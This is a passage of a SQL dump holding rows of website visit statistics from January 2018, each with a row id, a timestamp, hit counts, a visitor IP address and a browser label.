4.36.148.90','other'),(196785,1515613867,1,1,0,0,'178.154.171.88','other'),(196786,1515614010,1,1,0,0,'54.36.148.187','other'),(196787,1515614079,1,1,0,0,'54.36.149.95','other'),(196788,1515614388,1,1,0,0,'54.36.149.4','other'),(196789,1515614834,1,1,0,0,'54.36.148.126','other'),(196790,1515615096,1,1,0,0,'54.36.149.37','other'),(196791,1515615549,1,1,0,0,'54.36.149.28','other'),(196792,1515615564,1,1,0,0,'54.36.148.177','other'),(196793,1515615830,1,1,0,0,'54.36.149.49','other'),(196794,1515615969,1,1,0,0,'141.8.142.74','other'),(196795,1515615976,1,1,0,0,'107.167.108.209','other'),(196796,1515617333,1,1,0,0,'54.36.149.29','other'),(196797,1515617952,1,1,0,0,'54.36.148.186','other'),(196798,1515618010,1,1,0,0,'54.36.148.105','other'),(196799,1515618090,1,1,0,0,'141.8.142.74','other'),(196800,1515618108,1,0,1,0,'66.249.66.157',''),(196801,1515618250,1,1,0,0,'54.36.148.51','other'),(196802,1515618407,1,1,0,0,'178.95.156.151','chrome'),(196803,1515618486,1,1,0,0,'54.36.148.247','other'),(196804,1515618837,1,1,0,0,'91.196.178.29','chrome'),(196805,1515619277,1,1,0,0,'54.36.149.86','other'),(196806,1515619390,1,1,0,0,'54.36.149.57','other'),(196807,1515620236,2,2,0,0,'141.8.142.74','other'),(196808,1515620575,1,0,1,0,'66.249.66.151',''),(196809,1515621370,1,1,0,0,'54.36.148.181','other'),(196810,1515621567,1,1,0,0,'8.29.198.27','other'),(196811,1515621613,1,1,0,0,'54.36.148.242','other'),(196812,1515622208,1,1,0,0,'141.8.142.74','other'),(196813,1515622483,1,1,0,0,'74.115.214.133','other'),(196814,1515623829,1,1,0,0,'54.36.149.18','other'),(196815,1515624228,1,1,0,0,'178.154.171.88','other'),(196816,1515624590,1,1,0,0,'54.36.149.100','other'),(196817,1515624856,1,1,0,0,'207.46.13.173','other'),(196818,1515625469,1,1,0,0,'5.9.144.195','other'),(196819,1515625606,1,1,0,0,'54.36.148.238','other'),(196820,1515625615,1,1,0,0,'54.36.148.102','other'),(196821,1515625932,1,1,0,0,'54.36.148.34','other'),(196822,1515626070,1,1,0,0,'54.36.148.61','other'),(196823,1515626188,1,1,0,0,'178.154.171.88','other'),(196824,1515626244,1,1,0,0,'54.36.148.165','other'),(196825,1515626502,1,1,0,0,'54.36.148.78','other'),(196826,1515626672,1,1,0,0,'51.255.71.125','other'),(196827,1515626812,1,0,1,0,'66.249.66.76',''),(196828,1515627141,2,2,0,0,'54.165.59.7','other'),(196829,1515627970,1,1,0,0,'54.36.148.86','other'),(196830,1515627986,1,1,0,0,'66.249.66.155','chrome'),(196831,1515628160,2,2,0,0,'141.8.142.74','other'),(196832,1515628502,1,1,0,0,'54.36.148.31','other'),(196833,1515628509,1,1,0,0,'54.36.149.10','other'),(196834,1515629023,1,1,0,0,'54.36.148.197','other'),(196835,1515629726,1,1,0,0,'54.36.148.124','other'),(196836,1515630738,1,1,0,0,'141.8.142.74','other'),(196837,1515630922,1,1,0,0,'51.255.71.115','other'),(196838,1515631317,1,1,0,0,'54.36.149.88','other'),(196839,1515632400,1,1,0,0,'8.29.198.27','other'),(196840,1515632680,1,1,0,0,'54.36.148.84','other'),(196841,1515632711,1,1,0,0,'141.8.142.74','other'),(196842,1515632861,1,1,0,0,'54.36.148.205','other'),(196843,1515633607,1,0,1,0,'66.249.66.156',''),(196844,1515633725,1,1,0,0,'51.255.71.116','other'),(196845,1515634261,1,1,0,0,'54.36.149.25','other'),(196846,1515634532,1,1,0,0,'51.255.71.120','other'),(196847,1515634694,1,1,0,0,'178.154.171.88','other'),(196848,1515634789,1,1,0,0,'157.55.39.43','other'),(196849,1515635046,1,1,0,0,'54.36.148.248','other'),(196850,1515635169,1,0,1,0,'66.249.66.75',''),(196851,1515635311,1,1,0,0,'54.36.149.91','other'),(196852,1515635881,1,1,0,0,'217.69.133.225','other'),(196853,1515635912,1,1,0,0,'51.255.71.122','other'),(196854,1515636153,2,2,0,0,'40.77.167.43','other'),(196855,1515636338,1,1,0,0,'54.36.148.96','other'),(196856,1515636691,1,1,0,0,'141.8.142.74','other'),(196857,1515637657,1,1,0,0,'54.36.148.101','other'),(196858,1515637691,1,1,0,0,'40.77.167.56','other'),(196859,1515638231,1,1,0,0,'54.36.148.198','other'),(196860,1515638679,1,1,0,0,'141.8.142.74','other'),(196861,1515638693,1,1,0,0,'54.36.148.229','other'),(196862,1515638777,1,1,0,0,'54.36.148.146','other'),(196863,1515639228,1,1,0,0,'180.76.15.24','other'),(196864,1515639425,1,1,0,0,'217.69.136.207','other'),(196865,1515639526,1,1,0,0,'54.36.148.62','other'),(196866,1515639620,1,1,0,0,'141.8.142.74','other'),(196867,1515639650,1,1,0,0,'54.36.148.162','other'),(196868,1515639954,1,1,0,0,'40.77.167.56','other'),(196869,1515640121,1,1,0,0,'54.36.148.81','other'),(196870,1515640172,1,1,0,0,'54.36.148.110','other'),(196871,1515640306,1,1,0,0,'207.46.13.173','other'),(196872,1515640326,1,1,0,0,'54.36.149.74','other'),(196873,1515640330,1,1,0,0,'54.36.149.79','other'),(196874,1515640620,1,1,0,0,'66.249.66.155','chrome'),(196875,1515640694,2,2,0,0,'178.154.171.88','other'),(196876,1515640811,1,1,0,0,'54.36.148.180','other'),(196877,1515641539,1,1,0,0,'40.77.167.56','other'),(196878,1515642172,1,0,1,0,'66.249.66.156',''),(196879,1515642242,1,1,0,0,'54.36.149.37','other'),(196880,1515643233,1,1,0,0,'8.29.198.25','other'),(196881,1515643360,1,1,0,0,'141.8.142.74','other'),(196882,1515644883,1,1,0,0,'54.36.148.93','other'),(196883,1515645069,1,1,0,0,'54.36.149.74','other'),(196884,1515645284,1,1,0,0,'141.8.142.74','other'),(196885,1515645398,1,1,0,0,'54.36.148.65','other'),(196886,1515645619,1,1,0,0,'176.8.141.224','chrome'),(196887,1515646072,1,1,0,0,'54.36.148.174','other'),(196888,1515646673,1,1,0,0,'54.36.149.33','other'),(196889,1515647074,1,1,0,0,'54.36.148.185','other'),(196890,1515647254,1,1,0,0,'141.8.142.74','other'),(196891,1515647683,1,1,0,0,'54.36.148.109','other'),(196892,1515648077,1,1,0,0,'54.36.149.21','other'),(196893,1515648081,1,1,0,0,'51.255.71.131','other'),(196894,1515648851,1,1,0,0,'54.36.148.243','other'),(196895,1515649107,1,1,0,0,'141.8.142.74','other'),(196896,1515649162,1,1,0,0,'54.36.148.134','other'),(196897,1515649397,1,1,0,0,'54.36.148.133','other'),(196898,1515649724,1,1,0,0,'40.77.167.44','other'),(196899,1515650045,1,0,1,0,'66.249.66.156',''),(196900,1515650257,1,1,0,0,'54.36.149.75','other'),(196901,1515650680,1,1,0,0,'54.36.149.98','other'),(196902,1515650956,1,1,0,0,'54.36.148.139','other'),(196903,1515651005,1,1,0,0,'141.8.142.74','other'),(196904,1515652280,1,1,0,0,'54.36.148.184','other'),(196905,1515652956,1,1,0,0,'141.8.142.74','other'),(196906,1515653690,1,1,0,0,'40.77.167.43','other'),(196907,1515653905,16,16,0,0,'192.151.157.210','other'),(196908,1515654064,1,1,0,0,'8.29.198.27','other'),(196909,1515654235,1,1,0,0,'54.165.59.7','other'),(196910,1515654869,1,1,0,0,'54.36.148.46','other'),(196911,1515654947,1,1,0,0,'141.8.142.74','other'),(196912,1515655042,1,1,0,0,'94.179.39.16','chrome'),(196913,1515655060,1,1,0,0,'54.36.149.6','other'),(196914,1515655071,1,1,0,0,'188.230.43.254','other'),(196915,1515655583,1,1,0,0,'54.36.148.120','other'),(196916,1515655863,1,1,0,0,'95.132.61.238','firefox'),(196917,1515656074,1,1,0,0,'178.95.235.52','chrome'),(196918,1515656084,1,1,0,0,'54.36.148.114','other'),(196919,1515656137,1,1,0,0,'54.36.148.43','other'),(196920,1515656222,1,1,0,0,'77.222.134.100','firefox'),(196921,1515656373,1,1,0,0,'54.36.149.26','other'),(196922,1515656815,1,1,0,0,'178.154.171.88','other'),(196923,1515656935,1,1,0,0,'54.36.148.235','other'),(196924,1515656964,1,1,0,0,'51.255.71.127','other'),(196925,1515657071,2,2,0,0,'54.36.148.75','other'),(196926,1515657104,1,1,0,0,'95.132.61.238','firefox'),(196927,1515657507,1,1,0,0,'77.222.134.100','firefox'),(196928,1515658723,1,1,0,0,'178.154.171.88','other'),(196929,1515659021,1,1,0,0,'217.69.133.190','other'),(196930,1515659741,1,1,0,0,'91.196.178.70','chrome'),(196931,1515660113,1,1,0,0,'54.36.149.70','other'),(196932,1515660654,1,1,0,0,'141.8.142.74','other'),(196933,1515660824,1,1,0,0,'178.154.171.88','other'),(196934,1515660985,1,1,0,0,'66.249.66.155','chrome'),(196935,1515661264,1,1,0,0,'216.244.66.237','other'),(196936,1515661284,1,1,0,0,'54.36.148.166','other'),(196937,1515661727,1,0,1,0,'66.249.66.76',''),(196938,1515662631,1,1,0,0,'141.8.142.74','other'),(196939,1515663072,1,1,0,0,'195.77.80.87','chrome'),(196940,1515663218,1,1,0,0,'54.36.148.189','other'),(196941,1515663543,1,1,0,0,'207.46.13.0','other'),(196942,1515663744,2,2,0,0,'192.95.31.91','chrome'),(196943,1515664380,1,1,0,0,'54.36.148.177','other'),(196944,1515664436,1,1,0,0,'54.36.148.16','other'),(196945,1515664628,1,1,0,0,'141.8.142.74','other'),(196946,1515664697,1,1,0,0,'54.36.148.141','other'),(196947,1515664900,1,1,0,0,'8.29.198.25','other'),(196948,1515664953,1,1,0,0,'195.138.91.136','firefox'),(196949,1515665405,1,1,0,0,'54.36.148.149','other'),(196950,1515665652,1,1,0,0,'13.56.229.65','chrome'),(196951,1515665685,1,1,0,0,'54.36.148.55','other'),(196952,1515665783,1,1,0,0,'54.36.148.85','other'),(196953,1515666017,1,1,0,0,'54.36.148.154','other'),(196954,1515666336,1,1,0,0,'54.36.148.123','other'),(196955,1515666378,1,1,0,0,'178.94.250.227','firefox'),(196956,1515666604,1,1,0,0,'217.69.136.209','other'),(196957,1515666639,1,1,0,0,'78.111.185.198','chrome'),(196958,1515666669,1,1,0,0,'178.154.171.88','other'),(196959,1515667571,1,1,0,0,'54.36.149.7','other'),(196960,1515667652,1,1,0,0,'51.255.71.123','other'),(196961,1515668051,1,1,0,0,'54.36.148.203','other'),(196962,1515668130,1,1,0,0,'40.77.167.43','other'),(196963,1515668364,1,1,0,0,'66.249.66.156','chrome'),(196964,1515668535,1,1,0,0,'54.36.149.96','other'),(196965,1515668699,1,1,0,0,'54.36.148.186','other'),(196966,1515668851,2,2,0,0,'141.8.142.74','other'),(196967,1515668958,1,1,0,0,'54.36.149.0','other'),(196968,1515669178,1,1,0,0,'40.77.167.44','other'),(196969,1515670187,1,1,0,0,'82.19.60.37','other'),(196970,1515670230,1,1,0,0,'40.77.167.44','other'),(196971,1515670373,1,1,0,0,'168.235.201.91','chrome'),(196972,1515670375,1,1,0,0,'141.8.142.74','other'),(196973,1515670706,1,1,0,0,'54.36.148.37','other'),(196974,1515670892,1,0,1,0,'66.249.66.156',''),(196975,1515670955,1,1,0,0,'40.77.167.43','other'),(196976,1515671223,1,1,0,0,'178.95.129.248','chrome'),(196977,1515671724,2,2,0,0,'141.8.142.74','other'),(196978,1515671832,1,1,0,0,'54.36.148.33','other'),(196979,1515671886,1,1,0,0,'94.178.209.10','firefox'),(196980,1515672035,1,1,0,0,'54.36.148.115','other'),(196981,1515672183,1,1,0,0,'54.36.148.14','other'),(196982,1515672489,1,1,0,0,'54.36.149.28','other'),(196983,1515672603,1,1,0,0,'217.69.133.59','other'),(196984,1515672824,1,1,0,0,'91.209.11.236','other'),(196985,1515673112,1,1,0,0,'91.196.178.67','chrome'),(196986,1515673625,1,0,1,0,'66.249.66.76',''),(196987,1515673687,1,1,0,0,'91.200.12.196','chrome'),(196988,1515673716,1,1,0,0,'130.180.216.207','chrome'),(196989,1515673831,1,1,0,0,'54.36.148.156','other'),(196990,1515673893,1,1,0,0,'217.69.133.237','other'),(196991,1515673962,1,1,0,0,'66.249.66.157','chrome'),(196992,1515674117,1,1,0,0,'54.36.148.148','other'),(196993,1515674132,3,3,0,0,'142.44.151.76','other'),(196994,1515674588,1,1,0,0,'5.45.207.58','other'),(196995,1515675256,1,1,0,0,'87.250.224.85','other'),(196996,1515675517,1,1,0,0,'54.36.148.57','other'),(196997,1515675568,2,2,0,0,'91.196.178.68','chrome'),(196998,1515675733,1,1,0,0,'8.29.198.27','other'),(196999,1515675770,1,1,0,0,'54.36.148.99','other'),(197000,1515676089,1,1,0,0,'54.36.148.85','other'),(197001,1515676280,1,1,0,0,'54.36.149.44','other'),(197002,1515676348,1,1,0,0,'91.196.177.28','chrome'),(197003,1515676355,1,1,0,0,'54.36.149.35','other'),(197004,1515676523,1,1,0,0,'217.69.136.203','other'),(197005,1515676552,1,1,0,0,'54.36.148.46','other'),(197006,1515676731,1,1,0,0,'51.255.71.133','other'),(197007,1515677022,1,1,0,0,'46.174.163.134','chrome'),(197008,1515677203,2,2,0,0,'94.178.235.35','chrome'),(197009,1515677981,1,1,0,0,'46.211.112.131','chrome'),(197010,1515678116,1,1,0,0,'108.59.8.80','other'),(197011,1515678189,1,1,0,0,'87.250.224.85','other'),(197012,1515678193,1,1,0,0,'95.108.181.111','other'),(197013,1515678277,1,1,0,0,'91.196.178.100','chrome'),(197014,1515678542,1,1,0,0,'54.36.148.30','other'),(197015,1515678598,1,1,0,0,'54.36.148.203','other'),(197016,1515678926,1,1,0,0,'178.154.200.8','other'),(197017,1515679335,1,1,0,0,'217.69.133.223','other'),(197018,1515679459,1,0,1,0,'66.249.66.76',''),(197019,1515679630,1,1,0,0,'91.196.177.46','chrome'),(197020,1515680408,1,1,0,0,'54.36.148.26','other'),(197021,1515680692,1,1,0,0,'54.36.148.243','other'),(197022,1515680788,1,1,0,0,'54.36.149.25','other'),(197023,1515681404,1,0,1,0,'66.249.66.74',''),(197024,1515681445,1,1,0,0,'66.249.66.156','chrome'),(197025,1515682008,1,0,1,0,'66.249.66.75',''),(197026,1515682069,1,1,0,0,'217.69.143.217','firefox'),(197027,1515682263,1,1,0,0,'37.9.113.60','other'),(197028,1515682458,1,1,0,0,'54.36.148.208','other'),(197029,1515682679,1,1,0,0,'54.36.148.91','other'),(197030,1515682894,1,1,0,0,'91.196.178.72','chrome'),(197031,1515683534,1,1,0,0,'91.196.178.131','firefox'),(197032,1515683594,1,1,0,0,'54.36.148.208','other'),(197033,1515683656,1,1,0,0,'54.36.148.88','other'),(197034,1515683666,1,1,0,0,'66.249.66.157','chrome'),(197035,1515684608,1,1,0,0,'178.92.171.35','firefox'),(197036,1515684617,1,1,0,0,'66.249.66.74','chrome'),(197037,1515684628,2,2,0,0,'66.249.66.157','chrome'),(197038,1515684777,1,1,0,0,'74.115.214.156','other'),(197039,1515684812,15,15,0,0,'23.237.4.26','other'),(197040,1515685100,1,1,0,0,'91.196.178.166','chrome'),(197041,1515685526,1,1,0,0,'217.69.133.222','other'),(197042,1515685773,1,1,0,0,'37.9.113.138','other'),(197043,1515686102,1,1,0,0,'178.154.200.32','other'),(197044,1515686106,1,1,0,0,'87.250.224.39','other'),(197045,1515686249,2,0,2,0,'66.249.66.156',''),(197046,1515686331,1,1,0,0,'54.36.148.97','other'),(197047,1515686344,1,1,0,0,'54.36.148.80','other'),(197048,1515686458,1,1,0,0,'54.36.149.53','other'),(197049,1515686483,1,1,0,0,'54.36.148.112','other'),(197050,1515686534,1,1,0,0,'54.36.149.39','other'),(197051,1515686574,1,1,0,0,'8.29.198.26','other'),(197052,1515686770,1,1,0,0,'54.36.148.140','other'),(197053,1515687074,1,1,0,0,'54.36.148.134','other'),(197054,1515688159,1,0,1,0,'66.249.66.74',''),(197055,1515688214,1,1,0,0,'51.255.71.123','other'),(197056,1515688650,1,1,0,0,'54.36.149.34','other'),(197057,1515689175,1,1,0,0,'157.55.39.66','other'),(197058,1515689253,1,1,0,0,'54.36.148.117','other'),(197059,1515689254,1,1,0,0,'87.250.224.85','other'),(197060,1515689275,1,1,0,0,'54.36.148.200','other'),(197061,1515689373,1,1,0,0,'54.36.148.58','other'),(197062,1515689452,1,1,0,0,'54.36.149.75','other'),(197063,1515689472,1,1,0,0,'89.21.76.164','firefox'),(197064,1515689583,1,1,0,0,'217.69.133.221','other'),(197065,1515690622,1,1,0,0,'54.36.148.250','other'),(197066,1515690865,1,1,0,0,'54.36.148.11','other'),(197067,1515691349,1,1,0,0,'217.69.133.218','other'),(197068,1515691565,11,11,0,0,'154.16.138.15','other'),(197069,1515691612,1,1,0,0,'91.196.178.71','firefox'),(197070,1515692132,1,1,0,0,'54.36.149.44','other'),(197071,1515692556,4,4,0,0,'154.16.138.15','other'),(197072,1515692597,2,2,0,0,'77.111.244.57','chrome'),(197073,1515692606,1,1,0,0,'178.154.171.88','other'),(197074,1515693426,1,1,0,0,'54.36.149.66','other'),(197075,1515693433,1,1,0,0,'141.8.142.74','other'),(197076,1515694094,1,1,0,0,'54.36.149.33','other'),(197077,1515694123,1,1,0,0,'54.36.149.49','other'),(197078,1515694162,1,1,0,0,'54.36.149.48','other'),(197079,1515694249,1,1,0,0,'54.165.59.7','other'),(197080,1515695029,1,1,0,0,'54.36.148.98','other'),(197081,1515696094,2,2,0,0,'141.8.142.74','other'),(197082,1515696297,1,1,0,0,'51.255.71.122','other'),(197083,1515696412,1,1,0,0,'54.36.148.182','other'),(197084,1515696469,1,1,0,0,'54.36.148.167','other'),(197085,1515696563,1,1,0,0,'54.36.148.155','other'),(197086,1515696818,1,0,1,0,'66.249.66.155',''),(197087,1515697255,1,1,0,0,'54.36.148.199','other'),(197088,1515697325,1,1,0,0,'92.113.126.85','chrome'),(197089,1515697386,1,1,0,0,'54.36.149.66','other'),(197090,1515697422,1,1,0,0,'8.29.198.26','other'),(197091,1515697430,1,1,0,0,'51.255.71.115','other'),(197092,1515697708,1,1,0,0,'54.36.148.157','other'),(197093,1515698290,1,1,0,0,'217.69.133.192','other'),(197094,1515698346,2,2,0,0,'192.95.31.91','chrome'),(197095,1515698518,1,1,0,0,'54.36.149.31','other'),(197096,1515698535,1,1,0,0,'91.196.178.136','chrome'),(197097,1515698623,1,1,0,0,'54.36.148.250','other'),(197098,1515698939,1,1,0,0,'141.8.142.74','other'),(197099,1515698940,1,1,0,0,'91.196.178.24','chrome'),(197100,1515698969,1,1,0,0,'212.90.49.177','chrome'),(197101,1515699526,1,1,0,0,'54.36.148.133','other'),(197102,1515700062,1,1,0,0,'141.8.142.74','other'),(197103,1515700198,1,1,0,0,'54.36.149.28','other'),(197104,1515700252,1,1,0,0,'54.36.148.127','other'),(197105,1515700357,1,1,0,0,'157.55.39.66','other'),(197106,1515700561,1,1,0,0,'54.36.148.132','other'),(197107,1515700943,1,1,0,0,'54.36.148.229','other'),(197108,1515701278,1,1,0,0,'217.69.133.220','other'),(197109,1515701599,1,1,0,0,'54.36.149.70','other'),(197110,1515701812,1,1,0,0,'54.36.148.251','other'),(197111,1515701813,1,1,0,0,'54.36.149.92','other'),(197112,1515702407,1,1,0,0,'54.36.149.5','other'),(197113,1515703445,2,2,0,0,'141.8.142.74','other'),(197114,1515703473,1,1,0,0,'54.36.148.132','other'),(197115,1515703497,1,1,0,0,'54.36.148.126','other'),(197116,1515703499,1,1,0,0,'54.36.149.92','other'),(197117,1515703720,1,1,0,0,'217.69.133.228','other'),(197118,1515703934,1,1,0,0,'54.36.149.45','other'),(197119,1515704319,1,1,0,0,'54.36.148.10','other'),(197120,1515704909,1,1,0,0,'91.196.178.164','chrome'),(197121,1515705221,1,1,0,0,'54.36.148.136','other'),(197122,1515705393,1,1,0,0,'54.36.148.49','other'),(197123,1515705482,1,1,0,0,'54.36.148.188','other'),(197124,1515705777,1,1,0,0,'207.46.13.154','other'),(197125,1515706108,1,1,0,0,'54.36.148.69','other'),(197126,1515706327,1,1,0,0,'51.255.71.121','other'),(197127,1515706543,1,1,0,0,'54.36.149.59','other'),(197128,1515706715,1,1,0,0,'207.46.13.154','other'),(197129,1515706883,1,1,0,0,'141.8.142.74','other'),(197130,1515707104,1,1,0,0,'54.36.148.102','other'),(197131,1515707522,1,1,0,0,'178.154.171.88','other'),(197132,1515707615,1,1,0,0,'54.36.148.122','other'),(197133,1515707949,1,1,0,0,'217.69.133.5','other'),(197134,1515707955,1,1,0,0,'54.36.149.17','other'),(197135,1515708026,2,2,0,0,'188.230.43.254','other'),(197136,1515708032,1,1,0,0,'217.69.134.182','other'),(197137,1515708036,1,1,0,0,'217.69.134.177','other'),(197138,1515708051,1,1,0,0,'217.69.133.194','other'),(197139,1515708258,1,1,0,0,'8.29.198.26','other'),(197140,1515708331,1,1,0,0,'54.36.148.243','other'),(197141,1515709120,1,1,0,0,'54.36.149.61','other'),(197142,1515709324,1,1,0,0,'157.55.39.66','other'),(197143,1515709411,1,1,0,0,'54.36.149.67','other'),(197144,1515709435,1,1,0,0,'54.36.148.239','other'),(197145,1515709463,1,1,0,0,'54.36.149.32','other'),(197146,1515709648,1,1,0,0,'54.36.148.64','other'),(197147,1515710021,1,1,0,0,'217.69.133.190','other'),(197148,1515710024,1,1,0,0,'54.36.148.138','other'),(197149,1515710105,1,1,0,0,'54.36.148.157','other'),(197150,1515710201,1,1,0,0,'54.36.148.187','other'),(197151,1515710605,1,1,0,0,'216.244.66.237','other'),(197152,1515710845,1,1,0,0,'188.230.43.254','other'),(197153,1515710978,1,1,0,0,'178.154.171.88','other'),(197154,1515711776,1,1,0,0,'217.69.133.242','other'),(197155,1515711795,1,1,0,0,'157.55.39.66','other'),(197156,1515712203,1,1,0,0,'54.36.148.102','other'),(197157,1515712286,1,1,0,0,'54.36.148.139','other'),(197158,1515712966,1,1,0,0,'54.36.148.238','other'),(197159,1515713117,1,1,0,0,'46.46.86.150','msie'),(197160,1515713723,1,1,0,0,'108.59.8.80','other'),(197161,1515714247,1,1,0,0,'217.69.133.250','other'),(197162,1515714404,1,1,0,0,'141.8.142.74','other'),(197163,1515714705,1,1,0,0,'54.36.148.31','other'),(197164,1515714782,1,1,0,0,'54.36.149.93','other'),(197165,1515714872,1,0,1,0,'68.180.229.52',''),(197166,1515715108,2,2,0,0,'178.154.171.88','other'),(197167,1515715446,1,1,0,0,'217.69.133.84','other'),(197168,1515715561,1,1,0,0,'54.36.148.135','other'),(197169,1515715591,1,1,0,0,'54.36.149.70','other'),(197170,1515715603,1,1,0,0,'54.36.148.82','other'),(197171,1515716062,1,1,0,0,'54.36.149.25','other'),(197172,1515716172,1,1,0,0,'54.36.149.8','other'),(197173,1515716837,2,2,0,0,'207.46.13.154','other'),(197174,1515718495,1,1,0,0,'54.36.148.85','other'),(197175,1515718555,1,1,0,0,'141.8.142.74','other'),(197176,1515718972,1,1,0,0,'54.36.149.83','other'),(197177,1515718977,1,1,0,0,'54.36.149.12','other'),(197178,1515719064,1,1,0,0,'217.69.136.209','other'),(197179,1515719090,1,1,0,0,'8.29.198.27','other'),(197180,1515719570,1,1,0,0,'54.36.148.231','other'),(197181,1515720347,1,1,0,0,'54.36.148.78','other'),(197182,1515720852,1,1,0,0,'54.36.149.26','other'),(197183,1515720987,1,1,0,0,'54.36.148.234','other'),(197184,1515721085,1,1,0,0,'217.69.133.215','other'),(197185,1515721236,1,1,0,0,'51.255.71.113','other'),(197186,1515721728,1,1,0,0,'217.69.133.247','other'),(197187,1515721767,1,1,0,0,'141.8.142.74','other'),(197188,1515721875,1,1,0,0,'54.36.148.93','other'),(197189,1515721910,1,1,0,0,'178.154.171.88','other'),(197190,1515722086,1,1,0,0,'54.36.148.122','other'),(197191,1515723013,1,1,0,0,'217.69.133.221','other'),(197192,1515723077,1,1,0,0,'54.36.149.28','other'),(197193,1515723227,1,1,0,0,'54.36.148.76','other'),(197194,1515723478,1,1,0,0,'54.36.148.240','other'),(197195,1515723790,1,0,1,0,'66.249.66.155',''),(197196,1515724129,1,1,0,0,'54.36.148.204','other'),(197197,1515724335,1,1,0,0,'54.36.148.90','other'),(197198,1515724889,1,1,0,0,'54.36.148.119','other'),(197199,1515725243,2,2,0,0,'54.165.59.7','other'),(197200,1515725348,1,1,0,0,'87.250.224.46','other'),(197201,1515725352,2,2,0,0,'141.8.142.74','other'),(197202,1515725466,1,1,0,0,'54.36.148.76','other'),(197203,1515726570,1,1,0,0,'54.36.148.50','other'),(197204,1515727178,2,2,0,0,'141.8.142.74','other'),(197205,1515727596,1,1,0,0,'54.36.148.53','other'),(197206,1515727983,1,1,0,0,'66.249.66.155','chrome'),(197207,1515728265,2,2,0,0,'141.8.142.74','other'),(197208,1515729215,1,1,0,0,'54.36.148.92','other'),(197209,1515729635,1,1,0,0,'54.36.148.28','other'),(197210,1515729938,1,1,0,0,'8.29.198.26','other'),(197211,1515729988,1,1,0,0,'54.36.149.57','other'),(197212,1515730346,1,1,0,0,'54.36.149.23','other'),(197213,1515730675,2,2,0,0,'217.69.136.203','other'),(197214,1515731313,1,1,0,0,'141.8.142.74','other'),(197215,1515731718,1,1,0,0,'217.69.133.222','other'),(197216,1515731828,1,1,0,0,'217.69.133.215','other'),(197217,1515732223,1,1,0,0,'54.36.148.134','other'),(197218,1515732321,1,1,0,0,'217.69.133.242','other'),(197219,1515732339,1,1,0,0,'40.77.167.121','other'),(197220,1515732533,1,1,0,0,'217.69.136.203','other'),(197221,1515732535,1,1,0,0,'217.69.136.205','other'),(197222,1515732721,1,1,0,0,'54.36.148.157','other'),(197223,1515732749,1,1,0,0,'141.8.142.74','other'),(197224,1515732753,1,1,0,0,'178.154.171.88','other'),(197225,1515733000,1,1,0,0,'207.46.13.0','other'),(197226,1515733092,1,1,0,0,'93.80.129.63','msie'),(197227,1515733100,1,1,0,0,'54.36.148.39','other'),(197228,1515733447,1,1,0,0,'54.36.148.46','other'),(197229,1515733834,1,1,0,0,'217.69.133.221','other'),(197230,1515733841,1,1,0,0,'217.69.133.234','other'),(197231,1515733911,1,1,0,0,'217.69.133.240','other'),(197232,1515734442,1,1,0,0,'54.36.148.71','other'),(197233,1515734801,1,1,0,0,'54.36.148.180','other'),(197234,1515735346,1,1,0,0,'217.69.133.67','other'),(197235,1515735451,1,1,0,0,'109.194.87.169','firefox'),(197236,1515735598,1,1,0,0,'51.255.71.123','other'),(197237,1515735756,1,1,0,0,'54.36.148.95','other'),(197238,1515735814,1,1,0,0,'54.36.148.15','other'),(197239,1515736526,1,1,0,0,'54.36.149.84','other'),(197240,1515736656,1,1,0,0,'54.36.148.88','other'),(197241,1515736696,2,2,0,0,'141.8.142.74','other'),(197242,1515736708,1,1,0,0,'66.249.66.75','chrome'),(197243,1515736753,1,1,0,0,'54.36.148.244','other'),(197244,1515736860,1,1,0,0,'157.55.39.66','other'),(197245,1515736972,1,1,0,0,'51.255.71.115','other'),(197246,1515737040,1,1,0,0,'54.36.149.32','other'),(197247,1515737207,1,1,0,0,'54.36.148.113','other'),(197248,1515737393,1,1,0,0,'54.36.149.81','other'),(197249,1515737717,1,1,0,0,'142.234.115.155','other'),(197250,1515738213,1,1,0,0,'54.36.148.87','other'),(197251,1515738374,1,1,0,0,'54.36.149.27','other'),(197252,1515738380,4,4,0,0,'91.121.116.72','other'),(197253,1515738983,1,1,0,0,'40.77.167.121','other'),(197254,1515739574,1,1,0,0,'54.36.148.128','other'),(197255,1515739583,1,1,0,0,'51.255.71.130','other'),(197256,1515740013,1,1,0,0,'54.36.148.39','other'),(197257,1515740542,1,1,0,0,'141.8.142.74','other'),(197258,1515740608,1,1,0,0,'54.36.148.202','other'),(197259,1515740786,1,1,0,0,'8.29.198.25','other'),(197260,1515740793,1,1,0,0,'54.36.148.207','other'),(197261,1515740899,23,23,0,0,'192.99.203.35','other'),(197262,1515741217,1,1,0,0,'92.113.27.191','chrome'),(197263,1515741416,1,1,0,0,'54.36.149.9','other'),(197264,1515741740,2,2,0,0,'91.196.178.165','chrome'),(197265,1515741781,1,1,0,0,'93.78.215.251','chrome'),(197266,1515742110,1,1,0,0,'66.249.66.74','chrome'),(197267,1515742174,1,1,0,0,'217.69.133.238','other'),(197268,1515742877,1,1,0,0,'54.36.148.141','other'),(197269,1515742954,1,1,0,0,'217.69.133.216','other'),(197270,1515743128,1,1,0,0,'54.36.148.87','other'),(197271,1515743543,1,1,0,0,'54.36.149.7','other'),(197272,1515743638,1,1,0,0,'54.36.148.80','other'),(197273,1515743731,1,1,0,0,'91.196.178.166','chrome'),(197274,1515743853,1,1,0,0,'217.69.136.205','other'),(197275,1515743855,1,1,0,0,'217.69.136.208','other'),(197276,1515743963,1,1,0,0,'54.36.149.40','other'),(197277,1515744043,1,1,0,0,'195.230.119.34','chrome'),(197278,1515744182,1,1,0,0,'54.36.148.41','other'),(197279,1515744283,1,1,0,0,'91.196.178.161','chrome'),(197280,1515744345,1,0,1,0,'66.249.66.156',''),(197281,1515744532,2,2,0,0,'141.8.142.74','other'),(197282,1515744612,1,1,0,0,'54.165.59.7','other'),(197283,1515744994,1,1,0,0,'54.36.149.106','other'),(197284,1515745169,1,1,0,0,'54.36.148.95','other'),(197285,1515745298,1,1,0,0,'217.69.133.232','other'),(197286,1515745359,2,2,0,0,'192.151.145.178','other'),(197287,1515745494,1,1,0,0,'217.69.133.217','other'),(197288,1515745519,1,1,0,0,'54.36.149.13','other'),(197289,1515745706,4,4,0,0,'91.196.178.165','chrome'),(197290,1515745739,1,1,0,0,'54.36.148.198','other'),(197291,1515745832,1,1,0,0,'217.69.133.253','other'),(197292,1515745857,1,1,0,0,'91.196.178.166','chrome'),(197293,1515746276,1,1,0,0,'217.69.133.221','other'),(197294,1515746455,1,1,0,0,'141.8.142.74','other'),(197295,1515746505,1,1,0,0,'217.69.133.239','other'),(197296,1515746578,1,1,0,0,'54.36.148.111','other'),(197297,1515746911,1,1,0,0,'217.69.133.244','other'),(